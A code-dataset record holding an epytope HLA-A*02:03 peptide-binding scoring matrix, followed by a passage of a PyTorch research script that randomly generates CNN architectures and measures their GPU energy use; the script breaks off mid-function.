fe12b8a969844f7c2cc5981dca7b7c586822615e | 2,045 | py | Python | epytope/Data/pssms/smmpmbec/mat/A_02_03_8.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 7 | 2021-02-01T18:11:28.000Z | 2022-01-31T19:14:07.000Z | epytope/Data/pssms/smmpmbec/mat/A_02_03_8.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 22 | 2021-01-02T15:25:23.000Z | 2022-03-14T11:32:53.000Z | epytope/Data/pssms/smmpmbec/mat/A_02_03_8.py | christopher-mohr/epytope | 8ac9fe52c0b263bdb03235a5a6dffcb72012a4fd | [
"BSD-3-Clause"
] | 4 | 2021-05-28T08:50:38.000Z | 2022-03-14T11:45:32.000Z | A_02_03_8 = {0: {'A': 0.181, 'C': 0.005, 'E': 0.051, 'D': 0.112, 'G': 0.134, 'F': -0.47, 'I': -0.441, 'H': 0.022, 'K': 0.028, 'M': -0.38, 'L': -0.366, 'N': -0.011, 'Q': 0.211, 'P': 0.518, 'S': 0.119, 'R': 0.296, 'T': 0.213, 'W': -0.106, 'V': -0.045, 'Y': -0.07}, 1: {'A': 0.133, 'C': 0.06, 'E': 0.057, 'D': 0.23, 'G': 0.056, 'F': -0.128, 'I': -0.347, 'H': 0.306, 'K': 0.075, 'M': -0.823, 'L': -0.984, 'N': -0.041, 'Q': -0.162, 'P': 0.471, 'S': 0.378, 'R': 0.359, 'T': 0.349, 'W': 0.015, 'V': -0.001, 'Y': -0.004}, 2: {'A': -0.312, 'C': -0.043, 'E': 0.105, 'D': 0.058, 'G': -0.275, 'F': -0.093, 'I': -0.098, 'H': 0.094, 'K': -0.063, 'M': -0.105, 'L': -0.041, 'N': 0.087, 'Q': 0.23, 'P': 0.174, 'S': 0.014, 'R': 0.119, 'T': 0.082, 'W': 0.11, 'V': 0.017, 'Y': -0.059}, 3: {'A': 0.006, 'C': 0.001, 'E': -0.001, 'D': -0.001, 'G': -0.004, 'F': -0.006, 'I': -0.011, 'H': 0.007, 'K': 0.012, 'M': -0.004, 'L': -0.011, 'N': 0.001, 'Q': -0.002, 'P': -0.009, 'S': 0.006, 'R': 0.012, 'T': 0.002, 'W': 0.0, 'V': -0.005, 'Y': 0.008}, 4: {'A': -0.12, 'C': -0.012, 'E': 0.042, 'D': 0.061, 'G': 0.066, 'F': -0.076, 'I': -0.267, 'H': 0.121, 'K': 0.058, 'M': -0.06, 'L': -0.114, 'N': 0.129, 'Q': 0.109, 'P': 0.029, 'S': 0.099, 'R': 0.065, 'T': 0.015, 'W': 0.006, 'V': -0.189, 'Y': 0.04}, 5: {'A': -0.059, 'C': -0.011, 'E': 0.01, 'D': 0.026, 'G': 0.008, 'F': -0.064, 'I': -0.103, 'H': 0.069, 'K': 0.015, 'M': -0.026, 'L': -0.057, 'N': 0.067, 'Q': 0.069, 'P': -0.027, 'S': 0.07, 'R': 0.049, 'T': 0.039, 'W': -0.003, 'V': -0.056, 'Y': -0.017}, 6: {'A': -0.109, 'C': -0.022, 'E': 0.013, 'D': 0.006, 'G': -0.031, 'F': 0.047, 'I': 0.011, 'H': 0.071, 'K': 0.158, 'M': 0.072, 'L': 0.06, 'N': -0.009, 'Q': 0.051, 'P': -0.184, 'S': -0.089, 'R': 0.133, 'T': -0.14, 'W': -0.015, 'V': -0.086, 'Y': 0.064}, 7: {'A': -0.062, 'C': 0.213, 'E': 0.072, 'D': 0.054, 'G': -0.113, 'F': 0.283, 'I': 0.128, 'H': 0.192, 'K': 0.552, 'M': 0.069, 'L': -0.225, 'N': -0.203, 'Q': 0.267, 'P': 0.019, 'S': -1.157, 'R': 0.758, 'T': -0.312, 'W': 0.068, 'V': -0.691, 'Y': 0.089}, -1: {'con': 4.2909}} | 2,045 | 2,045 | 0.396088 | 496 | 2,045 | 1.627016 | 0.288306 | 0.019827 | 0.012392 | 0.01487 | 0.034696 | 0 | 0 | 0 | 0 | 0 | 0 | 0.375365 | 0.162347 | 2,045 | 1 | 2,045 | 2,045 | 0.095738 | 0 | 0 | 0 | 0 | 0 | 0.079668 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
43030e0d312386c135771fe0904fe61ef166b18c | 122,318 | py | Python | CNNGeneration/RandomCNNGeneration.py | NEUSoftGreenAI/NeurstrucEnergy | 94c5c2f4796382f37e0f2f77a4f6484c0e5f2260 | [
"MIT"
] | null | null | null | CNNGeneration/RandomCNNGeneration.py | NEUSoftGreenAI/NeurstrucEnergy | 94c5c2f4796382f37e0f2f77a4f6484c0e5f2260 | [
"MIT"
] | null | null | null | CNNGeneration/RandomCNNGeneration.py | NEUSoftGreenAI/NeurstrucEnergy | 94c5c2f4796382f37e0f2f77a4f6484c0e5f2260 | [
"MIT"
] | null | null | null | import os
from threading import Thread
import time
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import torch.utils.data as Data
import numpy as np
from multiprocessing import Process
from numpy import *
import torch.multiprocessing as mp
from torch.multiprocessing import Pool, Manager
from queue import Queue
import collections
import random
import requests
import csv
import string
import pandas as pd
import math
import traceback
# from monitor import Monitor
# from stableMonitor import stableMonitor
np.set_printoptions(threshold=500)
class CNN(nn.Module):
def __init__(self):
super(CNN,self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(1,16,5,1,2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(16,32,5,1,2),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2)
)
self.out = nn.Linear(32 * 7 * 7,10) #10分类的问题
def forward(self,x):
x = self.conv1(x)
x = self.conv2(x)
x = x.view(x.size(0),-1)
x = self.out(x)
return x
def achieve_stable_energy(return_dict):
'''
由于要尽量避免GPU的一些例如温度、静默功率、峰值功率等对后续的计算造成的影响,先运行一段时间等到功耗稳定后再进行后续生成
'''
monitor = stableMonitor(0.01)
EPOCH = 1000
BATCH_SIZE = 1000
LR = 0.001
x = torch.rand(BATCH_SIZE,1,28,28)
b_x = Variable(x).cuda()
cnn = CNN()
cnn.cuda()
optimizer = optim.Adam(cnn.parameters(),lr=LR)
loss_func = nn.CrossEntropyLoss()
'''
训练COUNT_TIME轮后,每前向传播一次计算一次方差,连续EARLY_STOP_TIME次方差降低,则继续,否则结束
'''
EARLY_STOP_TIME = 2
COUNT_TIME = 10
energy_cost_std_list = np.zeros(EARLY_STOP_TIME + 1)
count = 0
while(True):
torch.cuda.synchronize()
monitor.begin()
for j in range(0,30):
print(j)
output = cnn(b_x)
count += 1
torch.cuda.synchronize()
monitor.stop()
time.sleep(2)
if(count >= COUNT_TIME):
data = monitor.get_stable_energy_list()
for i in range(0,EARLY_STOP_TIME):
energy_cost_std_list[i] = energy_cost_std_list[i+1]
energy_cost_std_list[EARLY_STOP_TIME] = std(data)
print("方差列表:",energy_cost_std_list)
for i in range(0,EARLY_STOP_TIME):
if(energy_cost_std_list[i]!=0 and energy_cost_std_list[i]<energy_cost_std_list[i+1]):
return_dict['stable_silence_value'] = monitor.get_silence_energy()
print("能耗校正完成!")
monitor.exit()
return
else:
break
class NNgenerator(nn.Module):
def __init__(self,layer_parameters,layer_link,layer_id):
super(NNgenerator,self).__init__()
self.layer_parameters = layer_parameters
self.layer_link = layer_link
self.layer_id = layer_id
self.layer_list = []
self.parameters_flag = 0
self.link_flag = 0
# print(len(self.layer_id))
self.link_graph = self.link_vector_to_graph(self.layer_link,len(self.layer_id))
# print(self.link_graph)
in_degree_list = self.get_in_degree()
out_degree_list = self.get_out_degree()
# print(in_degree_list)
# print(out_degree_list)
for i in range(0,len(self.layer_id)):
params_length = self.get_params_length(self.layer_id[i])
link_length = self.get_link_length(i)
self.layer_list.append(self.make_layer(self.layer_parameters[self.parameters_flag:self.parameters_flag+params_length], self.layer_link[self.link_flag:self.link_flag+link_length], self.layer_id[i]))
self.parameters_flag += params_length
self.link_flag += link_length
self.layer_list = nn.ModuleList(self.layer_list)
# print(self.layer_list)
def make_layer(self, parameters, link, id):
'''
生成一个层
'''
# print(parameters,id,len(parameters))
if(id == 0):
in_channels,out_channels,kernel_size,stride,padding,dilation,groups = parameters[-7:]
return nn.Conv1d(in_channels,out_channels,kernel_size,stride=stride,padding=padding,dilation=dilation,groups=groups)
elif(id == 1):
# print(parameters)
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = parameters[-11:]
return nn.Conv2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width),groups=groups)
elif(id == 2):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups = parameters[-15:]
return nn.Conv3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width),groups=groups)
elif(id == 3):
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = parameters[-8:]
return nn.ConvTranspose1d(in_channels,out_channels,kernel_size=kernel_size,stride=stride,padding=padding,output_padding=output_padding,dilation=dilation,groups=groups)
elif(id == 4):
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups = parameters[-12:]
# print(in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups)
return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(id == 5):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,\
padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,dilation,groups = parameters[-16:]
return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(id == 6):
#如果是max pooling则需要返回indices
kernel_size,stride,padding,dilation,pool_type = parameters[-5:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool1d(kernel_size = kernel_size, stride=stride, padding=padding, dilation=dilation, return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 7):
#如果是max pooling则需要返回indices
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = parameters[-9:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width), return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width))
elif(id == 8):
#如果是max pooling则需要返回indices
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = parameters[-13:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width), return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width))
elif(id == 9):
kernel_size,stride,padding = parameters[-3:]
return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 10):
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = parameters[-6:]
return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(id == 11):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = parameters[-9:]
return nn.MaxUnpool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),padding=(padding_depth, padding_height, padding_width))
elif(id == 12):
output_size_L,pool_type = parameters[-2:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool1d(output_size_L)
else:
#为avg pooling
return nn.AdaptiveAvgPool1d(output_size_L)
elif(id == 13):
output_size_H,output_size_W,pool_type = parameters[-3:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool2d((output_size_H,output_size_W))
else:
#为avg pooling
return nn.AdaptiveAvgPool2d((output_size_H,output_size_W))
elif(id == 14):
output_size_D,output_size_H,output_size_W,pool_type = parameters[-4:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool3d((output_size_D,output_size_H,output_size_W))
else:
#为avg pooling
return nn.AdaptiveAvgPool3d((output_size_D,output_size_H,output_size_W))
elif(id == 15):
num_features = parameters[-1:][0]
return nn.BatchNorm1d(num_features)
elif(id == 16):
num_features = parameters[-1:][0]
return nn.BatchNorm2d(num_features)
elif(id == 17):
num_features = parameters[-1:][0]
return nn.BatchNorm3d(num_features)
elif(id == 18):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 19):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 20):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 21):
input_length,output_length = parameters[1],parameters[3]
return nn.Linear(input_length,output_length)
elif(id == 22):
sigmoid,tanh,ReLU,leaky_ReLU = parameters[-4:]
if(sigmoid == 1):
return nn.Sigmoid()
elif(tanh == 1):
return nn.Tanh()
elif(ReLU == 1):
return nn.ReLU()
else:
return nn.LeakyReLU()
#由于add和concat不是实际的神经网络层,随便返回一个神经网络层
elif(id == 23):
return nn.ReLU()
elif(id == 24):
return nn.ReLU()
elif(id == 25):
probability = parameters[-1:][0]
return nn.Dropout2d(p=probability)
elif(id == 26):
probability = parameters[-1:][0]
return nn.Dropout3d(p=probability)
def forward(self,x):
'''
出度为0,输出return
入度为0,表示接收初始输入
入度为1,正常节点,第一个位置表示接收初始输入
入度>1,concat或add节点
实现方法:
① 找到入度为0元素为初始输入
② 广度优先遍历邻接矩阵,将计算结果保存在列表comp_context中
③ 返回出度为0的结果
'''
layer_length = len(self.layer_id)
queue = Queue(layer_length)
comp_context = [0 for index in range(layer_length)]
unpool_indices = [0 for index in range(layer_length)]
in_degree_list = self.get_in_degree()
out_degree_list = self.get_out_degree()
BFS_flag = np.zeros(layer_length,dtype = int)
#广度遍历
for i in range(0,layer_length):
if(in_degree_list[i] == 0):
queue.put(i)
BFS_flag[i] = 1
while not queue.empty():
layer_index = queue.get()
# print(layer_index)
if(in_degree_list[layer_index] == 0):
'''
该节点入度为0时,只需要接受初始输入
'''
# print('self.layer_list[layer_index]',self.layer_id[layer_index])
# print('first',self.layer_list[layer_index],layer_index)
comp_context[layer_index] = self.layer_list[layer_index](x)
# print('first',comp_context[layer_index].shape)
# print(comp_context)
children_indices = self.get_children_indices(layer_index)#找到子节点位置
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
elif(in_degree_list[layer_index] > 0):
'''
该节点入度大于0时,找到所有父节点。
入度为1直接接受父节点输入,入度大于1为concat层和add层
'''
parent_indices = self.get_parent_indices(layer_index)#找到父节点位置
'''
如果父节点没有执行,即comp_context中没有计算结果,则将其重新放入队列尾。
由于广度优先遍历,入度为1时不存在这个问题,入度为2时可能存在
'''
if(len(parent_indices) == 1):
#全连接层需要加入一个展平操作
# print(comp_context[parent_indices[0]].size())
# # print(self.layer_list[layer_index])
# print("父节点",parent_indices[0])
# print("当前节点",layer_index)
if(self.layer_id[layer_index] == 21):
dimension = len(comp_context[parent_indices[0]].size())
#维度是2,之前有全连接层,已经展平了
if(dimension == 2):
# print('self.layerid',self.layer_id[layer_index])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
else:
# print(comp_context[parent_indices[0]].shape)
comp_context[layer_index] = comp_context[parent_indices[0]].view(comp_context[parent_indices[0]].size(0),-1)
# print(comp_context[layer_index].shape)
comp_context[layer_index] = self.layer_list[layer_index](comp_context[layer_index])
else:
if(self.layer_id[layer_index] == 6 or self.layer_id[layer_index] == 7 or self.layer_id[layer_index] == 8):
#池化层,考虑是否是MaxPool,如果是,加入indices
if(hasattr(self.layer_list[layer_index], 'return_indices')):
comp_context[layer_index],unpool_indices[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
# print('保存',layer_index,'unpool_indices')
else:
# print('self.layerid',self.layer_id[layer_index])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
elif(self.layer_id[layer_index] == 9 or self.layer_id[layer_index] == 10 or self.layer_id[layer_index] == 11):
#反池化层,使用indices
# print(unpool_indices[parent_indices[0]])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]],unpool_indices[parent_indices[0]])
else:
# print('self.layerid',self.layer_id[layer_index],'父节点',parent_indices,'父节点类型',self.layer_id[parent_indices[0]])
comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
# print('child',comp_context[layer_index])
children_indices = self.get_children_indices(layer_index)#找到子节点位置
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
elif(len(parent_indices) > 1):
#检查是否存在comp_context没有计算结果的节点,如果都计算过,则执行else后的语句
for i in range(0,len(parent_indices)):
if(type(comp_context[parent_indices[i]]) != torch.Tensor):
queue.put(layer_index)
break
else:
# print(self.layer_list[layer_index])
# print("父节点",parent_indices)
# for i in range(0,len(parent_indices)):
# print(comp_context[parent_indices[i]].size())
# print("当前节点",layer_index)
#把多个parent输出连接成元组
converge_tuple = ()
for i in range(0,len(parent_indices)):
converge_tuple += (comp_context[parent_indices[i]],)
if(self.layer_id[layer_index] == 23):
#concat层
comp_context[layer_index] = torch.cat(converge_tuple, 1)#channel拼接
elif(self.layer_id[layer_index] == 24):
#add层
comp_context[layer_index] = converge_tuple[0]
for i in range(1,len(parent_indices)):
# print(comp_context[layer_index].size(),converge_tuple[i].size())
comp_context[layer_index] = torch.add(comp_context[layer_index],converge_tuple[i])
#找到该节点的子节点加入队列
children_indices = self.get_children_indices(layer_index)#找到子节点位置
for i in range(0,len(children_indices)):
if(BFS_flag[children_indices[i]] == 0):
queue.put(children_indices[i])
BFS_flag[children_indices[i]] = 1
#找到入度为0的节点return
return_list = []
for i in range(0,layer_length):
if(out_degree_list[i] == 0):
return_list.append(comp_context[i])
return return_list
def get_link_length(self,pos):
'''
获取当前id的连接向量长度
'''
return pos+1
def get_in_degree(self):
'''
根据邻接矩阵,获取节点入度列表
'''
in_degree_list = []
for i in range(0,len(self.layer_id)):
node_row = list(self.link_graph[i])
node_row.pop(i)
in_degree_list.append(np.array(node_row).sum())
return in_degree_list
def get_out_degree(self):
'''
根据邻接矩阵,获取节点出度列表
'''
out_degree_list = []
for i in range(0,len(self.layer_id)):
#除去对角元
node_column = list(self.link_graph[:,i])
node_column.pop(i)
out_degree_list.append(np.array(node_column).sum())
return out_degree_list
def get_parent_indices(self,index):
'''
找到第index个节点的依赖输出节点
'''
node_row = list(self.link_graph[index])
parent_list = []
for i in range(0,len(node_row)):
if(node_row[i] == 1 and i != index):
parent_list.append(i)
return parent_list
def get_children_indices(self,index):
'''
找到第index个节点的子节点(即接收其输入的节点)
'''
node_column = list(self.link_graph[:,index])
children_list = []
for i in range(0,len(node_column)):
if(node_column[i] == 1 and i != index):
children_list.append(i)
return children_list
def link_vector_to_graph(self,link_list,length):
'''
将连接向量转化成邻接矩阵,对角线元素表示是否接收初始输入
'''
graph = np.zeros([length,length],dtype = float)
flag = 0
if len(link_list) != length * length:
for i in range(0,length):
for j in range(0,i+1):
graph[i,j] = link_list[flag]
flag += 1
else:
for i in range(0,length):
for j in range(0,length):
graph[i,j] = link_list[flag]
flag += 1
return graph
def get_params_length(self,layer_id):
'''
获取不同层参数向量长度
'''
get_params_length_dic = {
0:13,
1:19,
2:25,
3:14,
4:20,
5:26,
6:11,
7:17,
8:23,
9:9,
10:14,
11:19,
12:7,
13:9,
14:11,
15:4,
16:5,
17:6,
18:4,
19:5,
20:6,
21:4,
22:6,
23:3,
24:3,
25:5,
26:6,
}
return get_params_length_dic[layer_id]
def get_one_energy():
monitor = Monitor(0.001,2)
layer_parameters = [1000,1,28,28,1000,16,28,28,1,16,5,5,1,1,2,2,1,1,1, 1000,16*28*28,0,0,1,0 ,1000,16,28,28,1000,16,14,14,2,2,2,2,0,0,1,1,0 , 1000,16,14,14,1000,32,14,14,16,32,5,5,1,1,2,2,1,1,1, 1000,32*14*14,0,0,1,0 ,1000,32,14,14,1000,32,7,7,2,2,2,2,0,0,1,1,0 ,1000,32*7*7,1000,10 ]
layer_link = [1, 1,0, 0,1,0, 0,0,1,0, 0,0,0,1,0, 0,0,0,0,1,0, 0,0,0,0,0,1,0] # 最后1个表示接收原始输入
layer_id = [1,22,7,1,22,7,21]
NN = NNgenerator(layer_parameters,layer_link,layer_id)
# print(NN)
NN.cuda()
x = torch.rand(1000,1,28,28)
b_x = Variable(x).cuda()
output = NN(b_x)
# print(x)
torch.cuda.synchronize()
monitor.begin()
for j in range(0,1000):
output = NN(b_x)
torch.cuda.synchronize()
monitor.stop()
time.sleep(2)
def validate_NN(vg,dim):
# torch.cuda.empty_cache()
NN = NNgenerator(vg.layer_parameters,vg.layer_link,vg.layer_id)
# print(NN)
# NN.cuda()
if dim == 1:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2])
elif dim == 2:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3])
else:
x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3],vg.net_input[4])
b_x = Variable(x)
output = NN(b_x)
total_params = sum(p.numel() for p in NN.parameters())
# for p in NN.parameters():
# print(p.numel())
print(f'{total_params:,} total parameters.')
str1 = ''
str1 += ",".join('%s' %i for i in vg.layer_parameters) + " "
str1 += ",".join('%s' %i for i in vg.layer_link) + " "
str1 += ",".join('%s' %i for i in vg.layer_id) + " "
str1 += str(total_params) + " "
str1 += str(vg.dimension) + " "
str1 += str(vg.block_num) + " "
str1 += str(vg.stream_num) + " "
# str1 += cpu_name + " "
# str1 += cpu_MHz + " "
# str1 += cache_size + " "
# str1 += str(processor_num) + " "
# str1 += gpu_name + " "
# str1 += "0" + " "
# str1 += "0" + " "
# str1 += "0" + " "
# str1 += "0" + " "
with open("test.txt","a") as file: #只需要将之前的”w"改为“a"即可,代表追加内容
file.write(str1 + "\n")
file.close()
return True
def validate_NN_NVG(params,link,id,dim,input_shape):
# torch.cuda.empty_cache()
NN = NNgenerator(params,link,id)
# NN.cuda()
if dim == 1:
x = torch.rand(input_shape[0],input_shape[1],input_shape[2])
elif dim == 2:
x = torch.rand(input_shape[0],input_shape[1],input_shape[2],input_shape[3])
else:
x = torch.rand(input_shape[0],input_shape[1],input_shape[2],input_shape[3],input_shape[4])
b_x = Variable(x)
# print(b_x.shape)
output = NN(b_x)
total_params = sum(p.numel() for p in NN.parameters())
class VectorGenerator():
def __init__(self,dimension,block_num,stream_num,batchNorm_prob=0.5,dropout_prob=0.2,more_fc_prob=0.15,max_fc_num=2,delete_fc_prob=0.1,no_dropout = 0.5,large=1):
'''
dimension:数据维度
block_num:CNN块的数量
stream_num:几路神经网络,只能是1或2
batchNorm_prob:卷积层后加入BatchNorm概率
dropout_prob:卷积层、FC层后加入dropout概率
more_fc_prob:多个FC层的概率
max_fc_num:最大全连接层数量
delete_fc_prob:最后不接FC的概率
流程:
对于每个神经网络流
① 进行block_num次循环生成block_num个神经网络块
② 对于每个神经网络块,有唯一的输入和输出,中间可以有分支
③ 如果是2路神经网络,在最后加一个add和concat操作
④ 如果不接FC层,最后一个块或者2路神经网络合并后的结果作为输出
'''
super(VectorGenerator, self).__init__()
self.dimension = dimension # 1表示1d,2表示2d,3表示3d
self.block_num = block_num
self.stream_num = stream_num
self.batchNorm_prob = batchNorm_prob
self.dropout_prob = dropout_prob
self.more_fc_prob = more_fc_prob
self.max_fc_num = max_fc_num
self.delete_fc_prob = delete_fc_prob
self.no_dropout = no_dropout
self.large = large
if random.randint(1,100) <= no_dropout * 100:
self.no_dropout = True
else:
self.no_dropout = False
self.layer_num = 0 #记录当前已生成的节点数量
self.layer_parameters = []
self.layer_link = []
self.layer_id = []
self.net_input = self.get_net_input_size()
# print('self.net_input',self.net_input)
# self.make_net()
def make_net(self):
if(self.dimension == 1):
#生成CNN网络
stream_output_size = []
stream_output_index = []
for net_stream in range(0,self.stream_num):
#生成多流神经网络的一条
last_block_input_size = self.net_input
last_block_index = -1
for block in range(0,self.block_num):
#print("netstream",net_stream," 第",block,"个block")
#一条中的多个block
input_batch_size,input_channels,input_length = last_block_input_size
out_channels = 1
if(input_channels <= 3):
out_channels = random.randint(16,32)
else:
out_channels = random.randint(int(input_channels*1.8),input_channels*2)
out_shape = self.prob_random([int(input_length*0.5),input_length,int(input_length/3)],[0.8,0.2,0.1])
# print(input_height,out_shape)
output_size = [input_batch_size,out_channels,out_shape]
#block = 0 时,接收初始输入,为last_block_index = -1
last_block_index,channels = self.make_block(last_block_input_size,output_size,last_block_index,4)
output_size[1] = channels
last_block_input_size = output_size
if(block == self.block_num - 1):
#记录每个流最后一个块的输出大小
stream_output_size.append(output_size)
stream_output_index.append(self.layer_num - 1)
# print("生成流结束")
fc_length = 0
input_fc_size = last_block_input_size
if(self.stream_num > 1):
#把不同流的结果连接起来
if(stream_output_size[0] != stream_output_size[1]):
if(stream_output_size[0][2] > stream_output_size[1][2]):# 第一个更大一些
#在第一个流上再加一个块,以匹配尺寸大小
input_batch_size,input_channels,input_length = stream_output_size[0]
output_size = stream_output_size[1]
last_block_index = self.make_block(stream_output_size[0],stream_output_size[1],stream_output_index[0],4)
stream_output_index[0] = (self.layer_num-1)
stream_output_size[0] = stream_output_size[1]
last_block_input_size = output_size
else:#第二个更大一些
#在第二个流上再加一个块,以匹配尺寸大小
input_batch_size,input_channels,input_length = last_block_input_size
output_size = stream_output_size[0]
last_block_index = self.make_block(last_block_input_size,output_size,last_block_index,4)
stream_output_index[1] = (self.layer_num-1)
stream_output_size[1] = stream_output_size[0]
last_block_input_size = output_size
if(random.randint(1,100) < 30):
#Add
# print("流 添加Add")
params = self.make_layer(24,stream_output_size[0],add_num=len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2]
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [24] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
else:
#concat
#print("流 添加concat")
params = self.make_layer(23,stream_output_size[0],out_channels=stream_output_size[0][1] * len(stream_output_index))
fc_length = stream_output_size[0][1] * stream_output_size[0][2] * len(stream_output_index)
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(stream_output_index,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
input_fc_size = stream_output_size[0]
input_fc_size[1] *= len(stream_output_index)
#生成全连接层
if(random.randint(1,100) < self.delete_fc_prob * 100):
#不接全连接层
return
#计算前面所有层的参数数量
before_fc_params_num = 0
index = 0
for i in range(len(self.layer_id)):
length = self.get_params_length(self.layer_id[i])
before_fc_params_num += self.get_params_num(self.layer_id[i],self.layer_parameters[index:index+length])
index += length
#获取全连接层的个数
fc_num = 1
linaer_layer_output_index_list = []
while random.randint(1,100) <= 20:
fc_num += 1
if(fc_num == self.max_fc_num):
break
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
while (fc_params_num_ratio>0.9 or fc_params_num_ratio<0.6):
fc_params_num_ratio = np.random.normal(loc=0.8,scale=0.05,size=1)
fc_params_num = int(before_fc_params_num/(1-fc_params_num_ratio)) - before_fc_params_num
#生成全连接层,全连接层参数个数占比在80%左右
now_fc_num = 0
input_length = input_fc_size[1]*input_fc_size[2]
if fc_num == 1:
batch_size = input_fc_size[0]
output_length = int(fc_params_num / input_length)
if random.randint(1,100) <= 50 and output_length > 1000:
output_length = 1000
# print(fc_params_num,input_length)
assert output_length > 0, "找不到合适的全连接层"
params = self.make_layer(21,[batch_size,input_length],[batch_size,output_length])
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [21] # 加入层id列表中
self.layer_num += 1
else:
output_length_fc1 = 0
